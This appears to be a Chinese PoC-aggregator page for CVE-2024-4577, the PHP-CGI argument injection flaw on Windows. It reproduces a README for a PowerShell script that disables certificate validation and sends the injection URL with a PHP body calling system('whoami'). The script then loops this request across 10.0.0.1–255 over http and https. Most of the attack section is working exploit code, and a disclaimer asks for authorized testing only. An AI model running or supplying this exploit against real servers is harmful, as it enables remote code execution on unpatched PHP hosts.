POC详情: 63b489164e49ceb77d613a01e0548690d1a78c7b

来源
关联漏洞
标题: PHP 操作系统命令注入漏洞 (CVE-2024-4577)
描述:PHP是一种在服务器端执行的脚本语言。 PHP存在操作系统命令注入漏洞,该漏洞源于在特定条件下,Windows系统使用“Best-Fit”行为替换命令行中的字符,这可能导致PHP CGI模块错误地将这些字符解释为PHP选项,从而泄露脚本的源代码,在服务器上运行任意PHP代码等。以下版本受到影响:8.1至8.1.29之前版本,8.3至8.3.8之前版本,8.2至8.2.20之前版本。
描述
使用PowsrShell掃描CVE-2024-4577
介绍
# CVE-2024-4577_PowerShell

**請注意:  
請確保您已被授權在目標環境中進行此類滲透測試,未經授權使用攻擊技術可能違反相關法律。  
程式僅供教育和研究目的,請在合法和道德的範圍內使用。  
如果您不了解滲透測試可能帶來的後果,建議聘請紅隊專家來進行測試。**  

## 說明
一開始先設定無視網頁憑證檢查
```powershell
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
```

主要攻擊 Payload
```powershell
$url = "${Protocol}://$IP/php-cgi/php-cgi.exe?%add+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0"
$body = "<?php system('whoami'); die(); ?>"
```
包成 function 並用 PowerShell 內建的 Invoke-WebRequest 打出去 (可自行調整 TimeoutSec 設定)
```powershell
function Invoke-RequestForIP {
    param (
        [string]$IP,
        [string]$Protocol
    )
    $url = "${Protocol}://$IP/php-cgi/php-cgi.exe?%add+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0"
    $body = "<?php system('whoami'); die(); ?>"
    try {
        $response = Invoke-WebRequest -Uri $url -Method Post -Body $body -UseBasicParsing -TimeoutSec 2
        return $response.Content
    } catch {
        return $_.Exception.Message
    }
}
```

透過迴圈,掃描 10.0.0.1 ~ 10.0.0.255
```powershell
$baseIP = "10.0.0."
$start = 1
$end = 255

for ($i = $start; $i -le $end; $i++) {
    $currentIP = $baseIP + $i
    foreach ($protocol in @("http", "https")) {
        $result = Invoke-RequestForIP -IP $currentIP -Protocol $protocol
        Write-Output "IP: $currentIP, Protocol: $protocol, Result: $result"
    }
}
```

# 參考資料
<https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability>  
<https://nvd.nist.gov/vuln/detail/cve-2024-4577>
文件快照

[4.0K] /data/pocs/63b489164e49ceb77d613a01e0548690d1a78c7b ├── [ 949] cve_2024_4577.ps1 ├── [1.0K] LICENSE └── [1.9K] README.md 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。